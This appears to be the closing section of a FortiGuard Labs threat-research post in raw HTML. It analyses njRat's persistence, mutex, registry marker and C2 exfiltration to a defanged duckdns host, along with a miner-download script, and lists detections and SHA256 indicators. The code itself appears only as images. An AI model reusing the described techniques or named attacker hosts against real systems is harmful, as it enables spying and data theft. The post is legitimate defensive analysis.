data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_848684502.img.png/1664580463024/fig21.png" alt="Figure 21: The entry point of njRat" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 21: The entry point of njRat</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1068208180.img.png/1664580484767/fig22.png" alt="Figure 22: String decoding function" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 22: String decoding function</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>First, it creates lnk and exe files in the “Startup” and “Templates” folder with the filename “Windows”. This name is used to trick users and analysts into thinking it is a legitimate Windows file.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_397870754.img.png/1664580589671/fig23.png" alt="Figure 23: Creating persistence" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 23: Creating persistence</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It then gets its command and control server hostname and port number in reverse order.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1031759635.img.png/1664580604079/fig24.png" alt="Figure 24: Command and control server information" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 24: Command and control server information</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>To make sure this malware only runs on this victim once, it adds “HKEY_CURRENT_USER” with name “di” and data “!”.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_399066262.img.png/1664580630088/25.png" alt="Figure 25: Adding to the registry in “HKEY_CURRENT_USER”" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 25: Adding to the registry in “HKEY_CURRENT_USER”</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_550805023.img.png/1664580692263/26.png" alt="Figure 26: Registry status" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 26: Registry status</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It also creates a mutex with the string “Windows”, sets the environment variable “SEE_MASK_NOZONECHECKS” to 1, and checks if this mutex had been created before. If yes, it ends the process.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1099878936.img.png/1664580728525/27.png" alt="Figure 27: Creating a mutex" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 27: Creating a mutex</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_97469768.img.png/1664580746061/28.png" alt="Figure 28: Setting the environment variable" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 28: Setting the environment variable</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>After it collects the machine’s information, it uses base64 to encode it and concatenates the data, as seen in Figure 29. It then transfers the data to server “mobnew6565[.]duckdns[.]org” using hardcoded TCP port 7575.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1013434654.img.png/1664580804003/29.png" alt="Figure 29: Concatenated data" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 29: Concatenated data</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Following is the C2 traffic from the Win10 victim machine. The separator changes to “|-F-|” and version is “v4.0”, but the format for the packet is similar to the old njRat version:</p> <p style="margin-left: 40.0px;"><i><message length>.<command>|-F-|<data> </i></p> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1146905551.img.png/1664580815458/30.png" alt="Figure 30: Traffic captured from the victim" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 30: Traffic captured from the victim</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Besides Agent Tesla and njRat, we also found a short script in the updated HTML file “www.webclientservices.co[.]uk/p/1[.]html” that downloads a miner to “C:\\ProgramData”. This is odd behavior since each step in this attack chain is trying to not leave any physical trace or file on the victim’s machine. We think this might be a distraction for victims so as to not notice that another process is loading njRat.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_673096018.img.png/1664580845966/31.png" alt="Figure 31: JavaScript that downloads a miner" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 31: JavaScript that downloads a miner</span> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1044894801.img.png/1664580859586/32.png" alt="Figure 32: Process Explorer view for njRat and miner" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 32: Process Explorer view for njRat and miner</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Conclusion</h2> <p>Agent Tesla and njRat have both been highly active malware for years. Their functions are mature and easy to use for spying on or stealing information. As we mentioned previously, the malicious URL keeps updating its embedded JavaScript, which means these phishing emails and lure office documents are always an efficient way to spread this malware. All the VBA macro, PowerShell, and JavaScript code embedded in the website can deploy fileless attacks and also evade some virus detection by obfuscating or encoding the strings.</p> <p>Users should always be wary of any office document or unknown file containing links to external websites.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_844001079.img.png/1664581083199/33.png" alt="Figure 33: Attack flow" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 33: Attack flow</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Fortinet Protections</h2> <p>The VBA macro and all related malware are detected and blocked by FortiGuard Antivirus:</p> <p style="margin-left: 40.0px;">VBA/Agent.AIN!tr<br /> MSIL/Agent.CJX!tr.spy<br /> MSIL/Agent.CWR!tr<br /> MSIL/VXS!tr<br /> MSIL/CoinMiner.BMT!tr<br /> PowerShell/Agent.GJ!tr<br /> JS/SnakeKeylogger.A!tr.dldr<br /> PowerShell/Agent.AMM!tr<br /> </p> <p>Both the downloaded URL and attacker’s host have been rated as "Malicious Websites" by the FortiGuard Web Filtering service.</p> <p>Microsoft Office files can be disarmed by the FortiGuard Content Disarm & Reconstruction (CDR) service.</p> <p>Since the majority of malware is delivered via phishing, organizations should also consider leveraging Fortinet solutions designed to train users to understand and detect phishing threats:</p> <p style="margin-left: 40.0px;">Our FREE <a href="https://training.fortinet.com/?utm_source=blog&utm_medium=blog&utm_campaign=nse-institute">NSE training</a>: <a href="https://training.fortinet.com/local/staticpage/view.php?page=nse_1&utm_source=blog&utm_medium=blog&utm_campaign=nse-1">NSE 1 – Information Security Awareness</a> includes a module on internet threats designed to help end users learn how to identify and protect themselves from various types of phishing attacks and can be easily added to internal training programs.</p> <p style="margin-left: 40.0px;">The <a href="https://www.fortinet.com/products/phishing-simulation?utm_source=blog&utm_medium=blog&utm_campaign=phishing-simulation">FortiPhish Phishing Simulation Service</a> uses real-world simulations to help organizations test user awareness and vigilance to phishing threats and to train and reinforce proper practices when users encounter targeted phishing attacks.</p> <h2>IOCs</h2> <h3><span style="font-weight: normal;">SHA256:</span></h3> <h3><i style="font-weight: normal;">Office Document</i></h3> <p>9cb3a21f90dbb0dc5f3054a05571d8f2b5c2c06e0d24be4ec3a313cb7a061a60<br /> 63f13715d7c962f7eb36fe4cc7dbdbae1b599133ce2867bb346c11a61fac0990<br /> 2f17f9ef09e88e58f41e5d187ea39d22a2dc771f3adea622a6d25350a60309d9<br /> 34339322fd22bec66cb0272207e8f867af7d56e8d8441eadd23dcff6bcb77618</p> <h3><i style="font-weight: normal;">Script File</i></h3> <p>a44196d6b73d49ed6712df37fabd0e2b11d2bd91458c0351b6c7401e285b8a49<br /> 1844081002dc04a0e236503c233be07d7a0b6024c829fd0620f63075bb6a011a<br /> ad19384eec4bc0c3f95c90a550f99a7744584e85e86473c371f88ebd503fb6a0<br /> 37d5b2c02f52ba1f909e9e2002f091fb068b4385b67a72ab488866cef7ea00f6<br /> 1d4f733b56c865f1221ac48eb794c715e1143287ff2f2e4094e5eea3caaec11b<br /> da72d2feac3a24a332049b69df0cb7cab1a3734b5696effd3ebdf383f8f6ae32<br /> 539ff781c3b5065b98ca61927e13fd3bc7fe133f06b883a2fc13bc090bd4f4d3<br /> 2b85ed6d795c607344995e4e29bcf0fbef6f0600b783d495a20ca0098e471103<br /> 3a3e9467a2f88a29827895594907aeeeabede32e7966cdb3e8331fae6aa930da<br /> </p> <h3><i style="font-weight: normal;">Payload</i></h3> <p>a0931ce734fcc865c90fa7e9004bea8db551c32c699fdd389213c59cde3832cd<br /> bdb94f7c3a13ea102258540f372d4ae07a4d4943f0ae9324f44fdfa8481bfaf2<br /> dd72a7eebdd2d1cfabf430288d452fccfb90acc4d6956aa36194a35e9585b2c8</p> <h3><i style="font-weight: normal;">Loader</i></h3> <p>39e67f25b0fa660db0541bf37e315fb4def772bd3b6d67991b64a5a85914477d</p> <p><i>Learn more about Fortinet’s <a href="https://www.fortinet.com/fortiguard/labs?utm_source=blog&utm_medium=blog&utm_campaign=fortiguard-labs">FortiGuard Labs</a> threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services <a href="https://www.fortinet.com/solutions/enterprise-midsize-business/security-as-a-service/fortiguard-subscriptions?utm_source=blog&utm_medium=blog&utm_campaign=fortiguard-subscriptions">portfolio</a>. <a href="https://www.fortinet.com/blog/threat-research?utm_source=blog&utm_medium=blog&utm_campaign=threat-research">Sign up</a> to receive our threat research blogs.</i></p> </div> <div class="raw-import aem-GridColumn aem-GridColumn--default--12"> <div class="text-container"><div id="om-b2dxtopzidsdt3fkzfsv-holder"></div></div> </div> </div> </div> <div class="b16-blog-tags aem-GridColumn aem-GridColumn--default--12"> <div class="b16-blog-tags__container text-container" style="display:none"> <span class="b16-blog-tags__headline">Tags:</span> <p class="b16-blog-tags__tag-links"> <a href="https://www.fortinet.com/blog/tags-search.html?tag=microsoft">microsoft</a>, <a href="https://www.fortinet.com/blog/tags-search.html?tag=rat">rat</a>, <a href="https://www.fortinet.com/blog/tags-search.html?tag=fortiguard-labs">FortiGuard Labs</a>, <a href="https://www.fortinet.com/blog/tags-search.html?tag=agent-tesla">Agent Tesla</a> </p> </div> </div> <section class="b12-related aem-GridColumn aem-GridColumn--default--12"> <div class="b12-related__container text-container"> <h3>Related Posts</h3> <div class="b12-related__posts"> <a href="/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882" class="b12-related__post b12-related__post-0"> <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/excel-malware-thumb.jpg.thumb.319.319.png);"> <img class="ratio" alt="Excel Document Delivers Multiple Malware By Exploiting CVE-2017-11882 – Part I" aria-hidden="true" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAQAAAAe/WZNAAAADklEQVR42mNkgAJGDAYAAFEABCaLYqoAAAAASUVORK5CYII="/> </div> <div class="b12-related__text"> <p class="b12-related__category"> FortiGuard Labs Threat Research </p> <h5 class="b12-related__title">Excel Document Delivers Multiple Malware By Exploiting CVE-2017-11882 – Part I</h5> </div> </a> <a href="/blog/threat-research/microsoft-exchange-zero-day-vulnerability-updates" class="b12-related__post b12-related__post-1"> <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/microsoft-exchange-vuln-zero-day-thumb.jpg.thumb.319.319.png);"> <img class="ratio" alt="Microsoft Exchange 0-Day Vulnerability Updates" aria-hidden="true" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAQAAAAe/WZNAAAADklEQVR42mNkgAJGDAYAAFEABCaLYqoAAAAASUVORK5CYII="/> </div> <div class="b12-related__text"> <p class="b12-related__category"> FortiGuard Labs Threat Research </p> <h5 class="b12-related__title">Microsoft Exchange 0-Day Vulnerability Updates</h5> </div> </a> <a href="/blog/threat-research/fortiguard-labs-discovers-multiple-dotcms-vulnerabilities" class="b12-related__post b12-related__post-2"> <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/fg-labs-discover-dotcms-vuln-thumb.jpg.thumb.319.319.png);"> <img class="ratio" alt="Fortinet’s FortiGuard Labs Discovers Multiple dotCMS Vulnerabilities" aria-hidden="true" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAQAAAAe/WZNAAAADklEQVR42mNkgAJGDAYAAFEABCaLYqoAAAAASUVORK5CYII="/> </div> <div class="b12-related__text"> <p class="b12-related__category"> FortiGuard Labs Threat Research </p> <h5 class="b12-related__title">Fortinet’s FortiGuard Labs Discovers Multiple dotCMS Vulnerabilities</h5> </div> </a> </div> </div> </section> <div class="b13-comment-section aem-GridColumn aem-GridColumn--default--12"> <div class="b13-comment-section__container text-container"> </div> </div> <div class="b6-footer aem-GridColumn aem-GridColumn--default--12"> <div class="b6-footer__container text-container"> <div class="b6-footer__footer-info"> <div class="b6-footer__logo"> <a href="https://www.fortinet.com" target="_blank"> <img src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="Fortinet"/> </a> </div> <div class="b6-footer__social-footer"> <ul> <li class="social-icon linkedin"> <a href="https://www.linkedin.com/company/fortinet" target="_blank"> <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"> <path d="M15.934 15.835H12.55v-5.712c0-.897-1.008-1.64-1.905-1.64s-1.48.743-1.48 1.64v5.712H5.78V5.68h3.385v1.693c.558-.905 1.996-1.49 2.96-1.49 2.116 0 3.81 1.727 3.81 3.817v6.135zm-11.846 0H.703V5.68h3.385v10.155zM2.395.605c.935 0 1.693.757 1.693 1.69 0 .936-.758 1.694-1.693 1.694S.703 3.23.703 2.29C.703 1.36 1.46.6 2.395.6z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> </svg> </a> </li> <li class="social-icon twitter"> <a href="https://www.x.com/Fortinet" target="_blank"> <svg width="1200" height="1227" viewBox="0 0 1200 1227" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z" fill="white"/> </svg> </a> </li> <li class="social-icon youtube"> <a href="https://www.youtube.com/channel/UCJHo4AuVomwMRzgkA5DQEOA?sub_confirmation=1" target="_blank"> <svg viewBox="0 0 18 14" xmlns="http://www.w3.org/2000/svg"> <path d="M7.472 11.027V3.412L12.55 7.22l-5.08 3.806zM15.934.787C15.426.62 12.294.45 9.164.45c-3.13 0-6.26.16-6.77.322-1.32.44-1.69 3.4-1.69 6.447 0 3.03.37 6 1.69 6.43.51.17 3.64.33 6.77.33 3.13 0 6.262-.16 6.77-.33 1.32-.43 1.692-3.4 1.692-6.44 0-3.047-.372-6-1.692-6.43z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> </svg> </a> </li> <li class="social-icon instagram"> <a href="https://www.instagram.com/fortinet/" target="_blank"> <svg viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"> <path class="st0" d="M16,3.7c4,0,4.5,0,6.1,0.1c1.5,0.1,2.3,0.3,2.8,0.5c0.7,0.3,1.2,0.6,1.7,1.1c0.5,0.5,0.8,1,1.1,1.7 c0.2,0.5,0.4,1.3,0.5,2.8c0.1,1.6,0.1,2.1,0.1,6.1s0,4.5-0.1,6.1c-0.1,1.5-0.3,2.3-0.5,2.8c-0.3,0.7-0.6,1.2-1.1,1.7 c-0.5,0.5-1,0.8-1.7,1.1c-0.5,0.2-1.3,0.4-2.8,0.5c-1.6,0.1-2.1,0.1-6.1,0.1s-4.5,0-6.1-0.1c-1.5-0.1-2.3-0.3-2.8-0.5 c-0.7-0.3-1.2-0.6-1.7-1.1c-0.5-0.5-0.8-1-1.1-1.7c-0.2-0.5-0.4-1.3-0.5-2.8C3.7,20.5,3.7,20,3.7,16s0-4.5,0.1-6.1 c0.1-1.5,0.3-2.3,0.5-2.8C4.6,6.5,4.9,6,5.4,5.4c0.5-0.5,1-0.8,1.7-1.1c0.5-0.2,1.3-0.4,2.8-0.5C11.5,3.7,12,3.7,16,3.7 M16,1 c-4.1,0-4.6,0-6.2,0.1C8.2,1.2,7.1,1.4,6.2,1.8c-1,0.4-1.8,0.9-2.7,1.7C2.7,4.4,2.2,5.2,1.8,6.2c-0.4,1-0.6,2-0.7,3.6 C1,11.4,1,11.9,1,16c0,4.1,0,4.6,0.1,6.2c0.1,1.6,0.3,2.7,0.7,3.6c0.4,1,0.9,1.8,1.7,2.7c0.8,0.8,1.7,1.3,2.7,1.7 c1,0.4,2,0.6,3.6,0.7C11.4,31,11.9,31,16,31s4.6,0,6.2-0.1c1.6-0.1,2.7-0.3,3.6-0.7c1-0.4,1.8-0.9,2.7-1.7c0.8-0.8,1.3-1.7,1.7-2.7 c0.4-1,0.6-2,0.7-3.6C31,20.6,31,20.1,31,16s0-4.6-0.1-6.2c-0.1-1.6-0.3-2.7-0.7-3.6c-0.4-1-0.9-1.8-1.7-2.7 c-0.8-0.8-1.7-1.3-2.7-1.7c-1-0.4-2-0.6-3.6-0.7C20.6,1,20.1,1,16,1L16,1z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> <path class="st0" d="M16,8.3c-4.3,0-7.7,3.4-7.7,7.7s3.4,7.7,7.7,7.7s7.7-3.4,7.7-7.7S20.3,8.3,16,8.3z M16,21c-2.8,0-5-2.2-5-5 s2.2-5,5-5s5,2.2,5,5S18.8,21,16,21z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> <circle class="st0" cx="24" cy="8" r="1.8" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></circle> </svg> </a> </li> <li class="social-icon facebook"> <a href="https://www.facebook.com/fortinet" target="_blank"> <svg viewBox="0 0 9 18" xmlns="http://www.w3.org/2000/svg"> <path d="M8.934.758v3.385H7.24c-.583 0-.845.685-.845 1.27v2.114h2.54v3.385h-2.54v6.77H3.01v-6.77H.472V7.527H3.01V4.143c0-1.87 1.516-3.385 3.385-3.385h2.54z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> </svg> </a> </li> <li class="social-icon rss"> <a href="https://www.fortinet.com/rss-feeds.html" target="_blank"> <svg viewBox="0 0 18 18" xmlns="http://www.w3.org/2000/svg"> <path d="M3.072 17.68c-1.27 0-2.37-1.1-2.37-2.368 0-1.27 1.1-2.37 2.37-2.37s2.37 1.1 2.37 2.37-1.016 2.37-2.37 2.37zM.702.76v2.538c7.955 0 14.386 6.43 14.386 14.385h2.538C17.626 8.336 10.05.76.703.76zm0 5.162V8.46c5.078 0 9.224 4.146 9.224 9.223h2.54c0-6.514-5.248-11.76-11.763-11.76z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path> </svg> </a> </li> </ul> </div> </div> <div class="b6-footer__footer-links"> <div class="b6-footer__footer-links-column"> <h4 class="b6-footer__header">News & Articles</h4> <ul> <li> <a href="https://www.fortinet.com/corporate/about-us/newsroom/press-releases.html" target="_self">News Releases</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/newsroom/news.html" target="_blank">News Articles</a> </li> </ul> </div> <div class="b6-footer__footer-links-column"> <h4 class="b6-footer__header">Security Research</h4> <ul> <li> <a href="https://www.fortinet.com/fortiguard/threat-intelligence/threat-research.html" target="_self">Threat Research</a> </li> <li> <a href="https://fortiguard.com/" target="_self">FortiGuard Labs</a> </li> <li> <a href="https://www.fortinet.com/fortiguard/threat-intelligence/threat-map.html" target="_self">Threat Map</a> </li> <li> <a href="https://www.fortinet.com/solutions/ransomware.html" target="_self">Ransomware Prevention</a> </li> </ul> </div> <div class="b6-footer__footer-links-column"> <h4 class="b6-footer__header">Connect With Us</h4> <ul> <li> <a href="https://community.fortinet.com/" target="_blank">Fortinet Community</a> </li> <li> <a href="https://www.fortinet.com/partners/partner-program/become-a-fortinet-partner" target="_blank">Partner Portal</a> </li> <li> <a href="https://investor.fortinet.com/" target="_blank">Investor Relations</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/product-certifications" target="_blank">Product Certifications</a> </li> </ul> </div> <div class="b6-footer__footer-links-column"> <h4 class="b6-footer__header">Company</h4> <ul> <li> <a href="https://www.fortinet.com/corporate/about-us/about-us" target="_blank">About Us</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/executive-management" target="_self">Exec Mgmt</a> </li> <li> <a href="https://www.fortinet.com/corporate/careers" target="_self">Careers</a> </li> <li> <a href="https://www.fortinet.com/nse-training" target="_self">Training</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/events" target="_self">Events</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/industry-awards" target="_self">Industry Awards</a> </li> <li> <a href="https://www.fortinet.com/corporate/about-us/corporate-social-responsibility" target="_self">Social Responsibility</a> </li> <li> <a href="/resources/cyberglossary" target="_self">CyberGlossary</a> </li> <li> <a href="https://www.fortinet.com/sitemap" target="_self">Sitemap</a> </li> <li> <a href="https://www.fortinet.com/blog/blog-sitemap" target="_self">Blog Sitemap</a> </li> </ul> </div> <div class="b6-footer__contact-info"> <h4 class="b6-footer__header">Contact Us</h4> <ul> <li>(866) 868-3678</li> </ul> </div> </div> <div class="b6-footer__copyright"> <div class="b6-footer__copyright-info"> <p class="b6-footer__copyright-text">Copyright © 2024 Fortinet, Inc. All Rights Reserved</p> <a class="b6-footer__copyright-link" href="https://www.fortinet.com/corporate/about-us/legal.html" target="_blank">Terms of Services</a> <a class="b6-footer__copyright-link" href="https://www.fortinet.com/corporate/about-us/privacy.html" target="_blank">Privacy Policy</a> <span class="ot-ftnt-cookie-settings"> | <a href="#" onclick="Optanon.ToggleInfoDisplay()">Cookie Settings</a></span> </div> </div> </div>  </div> </div> </div> <script src="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.ba4f082a77dabb2c6baf715d9eb61c22.js"></script>  <div class="be-ix-link-block"> <div class="be-related-link-container container"><div class="be-label">Also of Interest:</div><ul class="be-list"><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/ciso-collective/top-security-threats-for-government">DOJ & Top Security Threats</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/industry-trends/paying-ransomware">Pay Ransomware Settlements?</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros">LokiBot Campaign Targets Microsoft Office...</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people">New Agent Tesla Campaign Targeting...</a></li></ul> </div>  </div>  </body> </html>

CINXE.COM

Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs